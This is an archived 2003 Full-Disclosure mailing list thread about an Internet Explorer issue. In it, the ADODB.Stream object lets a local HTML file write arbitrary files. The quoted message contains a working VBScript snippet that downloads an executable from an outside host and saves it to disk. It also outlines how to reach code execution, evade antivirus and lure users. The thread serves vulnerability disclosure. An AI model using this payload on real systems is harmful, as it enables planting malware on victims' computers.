lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: lists.netsys.com at jscript.dk (Thor Larholm)
Subject: ADODB.Stream object

HTML files, regardless of security zone, should not in themselves be allowed to
write to the local file system or execute arbitrary commands. This is precisely
the purpose of HTML Applications (HTA).

Just like executing arbitrary commands through codeBase in local zones is a
vulnerability that leverages system compromise, so is writing to arbitrary files
from the local zone. I definitely think of this as a vulnerability of its own.



Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher


----- Original Message ----- 
From: "jelmer" <jkuperus@...net.nl>
To: <full-disclosure@...ts.netsys.com>
Sent: Tuesday, August 26, 2003 2:55 PM
Subject: [Full-Disclosure] ADODB.Stream object


>
> A few days microsoft patched an Internet Explorer Object Data Remote
> Execution Vulnerability found by EEYE, shortly after,
> HTTP-EQUIV posted some sample code on his website shortly followed by finjan
> (pimping their product) on bugtraq
> Both where kind of messy so I decided to write my own and thought I might be
> able to use the ADODB.Stream object to create the file on disk. unfortunatly
> for some weird reason this didn't quite succeed and i settled on
> http://ip3e83566f.speed.planet.nl/eeye.html , it is rather slow but does the
> trick and changing the payload is done in a matter of seconds.
>
> But anyway while playing with the ADODB.Stream object I did find that it
> allows writing /  overwriting of files from within a simple html file when
> run from a location on your harddisk (and consequentially allowing execution
> of arbitrary code by for instance overwriting telnet and then all a
> telnet:// style URL)
>
> this kind of behaviour is generally only allowed from within trusted
> containers, such as HTA's
> Also it doen't set off norton antivirus's script protection
>
> here's the a code snipet that illustrates this, its been tested on IE6 on
> winXP :
>
>
> <script language="vbscript">
>
>     const adTypeBinary = 1
>     const adSaveCreateOverwrite = 2
>     const adModeReadWrite = 3
>
>     set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
>     xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",
> false
>     xmlHTTP.send
>     contents = xmlHTTP.responseBody
>
>     Set oStr = CreateObject("ADODB.Stream")
>     oStr.Mode = adModeReadWrite
>     oStr.Type = adTypeBinary
>     oStr.Open
>
>     oStr.Write(contents)
>     oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite
>
> </script>
>
> I dont think it in it self can not be concidered a security vulnerabilty as
> it only works when the file containing the code is present on a users
> harddisk, though html files are generally considered trusted and you can
> probably trick some people into opening an html file by sending it to them
> through msn messenger or whatever.
> It can most likely be used to leverage other vulnerabilities, for instance
> many programs download information to predictable locations from where you
> might invoke it.
> Now invoking it from the local disk has been somewhat of a problem since IE6
> sp1 as it basicly disallows access to file:/// style URL's  from the
> internet. however there are some (rather messy) workarounds, HTTP-EQUIV
> posted a way of circumventing this a while back using media player 8
> also i found out a long time ago that calling local files from window shares
> is still very much allowed and you can link to html files placed on windows
> shares from the internet though this is rather cumbersome to set up, other
> hopefully easier ways will probably pop up.
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ